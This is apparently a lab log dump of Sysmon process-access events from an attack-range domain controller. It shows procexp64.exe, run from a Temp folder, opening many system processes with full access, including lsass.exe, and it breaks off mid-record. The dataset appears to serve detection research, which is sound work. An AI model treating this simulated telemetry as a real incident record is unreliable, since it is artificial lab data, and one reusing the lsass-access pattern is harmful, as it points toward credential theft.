10341000x8000000000000000788776Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788775Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788774Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788773Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788772Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788771Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788770Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788769Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788768Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788767Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788766Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788765Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788764Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788763Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788886Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788885Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788884Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788883Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788882Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788881Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788880Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788879Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788878Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788877Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788876Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788875Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788874Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788873Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788872Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788871Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788870Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788869Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788868Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788867Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788866Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788865Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788864Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788863Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program 